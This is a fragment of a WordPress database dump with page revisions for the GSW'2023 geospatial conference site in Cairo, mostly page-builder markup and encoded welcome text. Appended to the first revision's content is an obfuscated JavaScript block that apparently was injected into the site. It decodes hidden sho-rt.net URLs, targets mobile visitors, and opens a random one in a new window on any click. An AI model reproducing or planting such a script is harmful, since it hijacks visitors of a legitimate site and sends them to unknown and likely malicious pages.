GFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][dt_team_masonry][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 19:46:01','2022-10-06 19:46:01','',2167,'https://gsw2023.com/?p=2323',0,'revision','',0),
(2324,1,'2022-10-06 19:47:52','2022-10-06 19:47:52','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" 